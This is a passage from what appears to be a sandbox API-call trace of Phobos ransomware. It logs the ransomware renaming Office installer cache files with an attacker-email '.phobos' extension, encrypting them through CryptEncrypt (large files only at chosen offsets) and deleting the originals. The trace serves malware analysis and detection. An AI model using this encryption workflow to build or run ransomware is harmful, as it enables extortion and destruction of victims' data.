users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi")) returned 0x2020 [0155.605] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0155.605] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0155.605] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0155.605] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0155.605] ReadFile (in: hFile=0x188, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0156.157] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0156.157] ReadFile (in: hFile=0x188, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0156.610] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0156.610] ReadFile (in: hFile=0x188, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0156.859] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32ca8) returned 1 [0156.859] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0156.859] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0156.865] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0156.865] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0156.866] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0156.890] SetEndOfFile (hFile=0x188) returned 1 [0156.890] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0156.890] WriteFile (in: hFile=0x188, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0156.892] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0156.892] WriteFile (in: hFile=0x188, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0156.894] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0156.894] WriteFile (in: hFile=0x188, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0156.902] CloseHandle (hObject=0x188) returned 1 [0156.902] SetEvent (hEvent=0xe8) returned 1 [0156.902] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0156.902] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0156.902] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=191872) returned 1 [0156.902] CloseHandle (hObject=0x188) returned 1 [0156.902] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 0x2020 [0156.902] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0156.903] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0156.903] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0156.903] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0156.903] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0156.903] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0156.903] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0156.903] ReadFile (in: hFile=0x188, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2ed80, lpOverlapped=0x0) returned 1 [0157.059] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2ed90, dwBufLen=0x2ed90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2ed90) returned 1 [0157.061] WriteFile (in: hFile=0x184, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2ed90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2ed90, lpOverlapped=0x0) returned 1 [0157.064] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0157.064] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0157.064] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0157.064] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0157.064] WriteFile (in: hFile=0x184, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0157.064] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0157.064] CloseHandle (hObject=0x188) returned 1 [0157.064] CloseHandle (hObject=0x184) returned 1 [0157.064] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 1 [0157.066] SetEvent (hEvent=0xe8) returned 1 [0157.066] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0157.066] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0157.066] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3584) returned 1 [0157.066] CloseHandle (hObject=0x184) returned 1 [0157.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 0x2020 [0157.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.067] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0157.067] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0157.067] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0157.067] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0157.067] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0157.067] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0157.067] ReadFile (in: hFile=0x184, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe00, lpOverlapped=0x0) returned 1 [0157.129] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe10, dwBufLen=0xe10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe10) returned 1 [0157.129] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe10, lpOverlapped=0x0) returned 1 [0157.130] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0157.130] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0157.130] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0157.130] CryptDestroyKey (hKey=0xa32c68) returned 1 [0157.130] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0157.130] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0157.130] CloseHandle (hObject=0x184) returned 1 [0157.130] CloseHandle (hObject=0x188) returned 1 [0157.130] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 1 [0157.132] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0157.132] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0157.135] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=28016276) returned 1 [0157.135] CloseHandle (hObject=0x184) returned 1 [0157.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab")) returned 0x2020 [0157.135] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0157.135] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0157.136] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0157.136] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0157.136] ReadFile (in: hFile=0x184, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0157.289] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0157.289] ReadFile (in: hFile=0x184, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0157.318] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0157.318] ReadFile (in: hFile=0x184, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0157.389] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32968) returned 1 [0157.389] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0157.389] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0157.395] CryptDestroyKey (hKey=0xa32968) returned 1 [0157.395] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0157.395] WriteFile (in: hFile=0x184, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0157.410] SetEndOfFile (hFile=0x184) returned 1 [0157.410] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0157.410] WriteFile (in: hFile=0x184, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0157.412] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0157.412] WriteFile (in: hFile=0x184, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0157.415] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0157.415] WriteFile (in: hFile=0x184, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0157.415] CloseHandle (hObject=0x184) returned 1 [0157.416] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0157.416] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0157.416] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1992192) returned 1 [0157.416] CloseHandle (hObject=0x184) returned 1 [0157.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0157.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0157.417] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0157.417] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0157.417] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0157.417] ReadFile (in: hFile=0x184, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0157.621] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0157.622] ReadFile (in: hFile=0x184, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0157.650] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0157.651] ReadFile (in: hFile=0x184, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0158.144] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32c28) returned 1 [0158.144] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0158.144] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0158.152] CryptDestroyKey (hKey=0xa32c28) returned 1 [0158.152] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0158.152] WriteFile (in: hFile=0x184, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0158.171] SetEndOfFile (hFile=0x184) returned 1 [0158.171] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0158.171] WriteFile (in: hFile=0x184, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0158.173] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0158.173] WriteFile (in: 